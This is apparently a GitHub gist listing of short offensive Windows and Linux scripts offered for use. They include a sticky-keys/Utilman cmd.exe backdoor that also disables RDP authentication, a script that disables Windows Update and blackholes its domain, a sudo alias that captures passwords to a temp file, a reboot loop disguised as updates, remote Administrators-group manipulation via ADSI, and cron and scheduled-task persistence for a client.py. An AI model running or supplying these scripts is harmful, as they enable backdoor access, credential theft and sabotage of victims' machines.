ahhh
/ sticky_keys_persitence.bat
Last active
September 9, 2022 10:17
Batch script to launch a cmd backdoor when stickykeys, utiliman, or display keyboard hotkeys are toggled. Also starts RDP.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f | |
| REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f | |
| netsh firewall set service type = remotedesktop mode = enable | |
| netsh advfirewall firewall set rule group="remote desktop" new enable=Yes | |
| net start TermService |
ahhh
/ disable_updates.bat
Last active
February 26, 2022 07:03
batch script to disable windows updates to weaken a server for persistence
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v AUOptions /t REG_DWORD /d 1 /f | |
| REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v UseWUServer /t REG_DWORD /d 1 /f | |
| REG ADD "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /F /v WUServer /t REG_SZ /d http://127.0.0.1 | |
| REG ADD "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /F /v WUStatusServer /t REG_SZ /d http://127.0.0.1 | |
| REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /F /v NoWindowsUpdate /t REG_DWORD /d 1 | |
| REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\Internet Communication Management\Internet Communication" /F /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 | |
| REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /F /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 | |
| echo 127.0.0.1 windowsupdate.microsoft.com >> \windows\system32\drivers\etc\hosts |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/vbash | |
| source /opt/vyatta/etc/functions/script-template | |
| configure | |
| set system login user jsmith full-name "John Smith" | |
| set system login user jsmith authentication plaintext-password foobar123 | |
| set system login user jsmith level admin | |
| commit | |
| rm /tmp/adduserscript |
ahhh
/ bieber_fever.bat
Created
March 25, 2015 16:18
Troll schedule task to open IE to justinbiebermusic.com ever 5 minutes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| schtasks /create /sc minute /mo 5 /tn msupdater /tr "\"%ProgramFiles%\Internet Explorer\iexplore.exe\" -k http://www.justinbiebermusic.com" |
ahhh
/ reboot_loop.bat
Created
March 25, 2015 16:23
Troll script to reboot a machine and keep rebooting it every time it starts
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| schtasks /create /sc onstart /tn msupdate /tr "shutdown /r /f /c """Rebooting to install updates""" /t 2" | |
| shutdown /r /f /c "Rebooting to install updates" /t 2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alias sudo='echo -n "[sudo] password for $USER: " && read -r password && echo "$password" >/tmp/su && /usr/bin/sudo $@' |
ahhh
/ gist:951f3b66f7de978ed7fe
Last active
October 21, 2016 06:15
— forked from HarmJ0y/gist:fd98c4f16575ba28c091
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Add a domain user to a remote server local group, if your current user has admin over the remote machine | |
| powershell -c ([ADSI]'WinNT://SERVER/Administrators,group').add('WinNT://DOMAIN/USER,user') | |
| # Get all local groups on a remote server | |
| powershell -c "([ADSI]'WinNT://SERVER,computer').psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0]}" | |
| # Find members of the local Administrators group on a remote server | |
| powershell -c "$([ADSI]'WinNT://SERVER/Administrators,group').psbase.Invoke('Members') | foreach { $_.GetType().InvokeMember('ADspath', 'GetProperty', $null, $_, $null).Replace('WinNT://', '') }" | |
| # Enable the local Administrator account on a remote server |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "*/5 * * * * python /tmp/client.py" | crontab - |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| schtasks /create /sc minute /mo 5 /tn ntp /tr "C:\Python32\python.exe C:\Windows\Temp\client.py" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| at -f client.py -v 10:20 |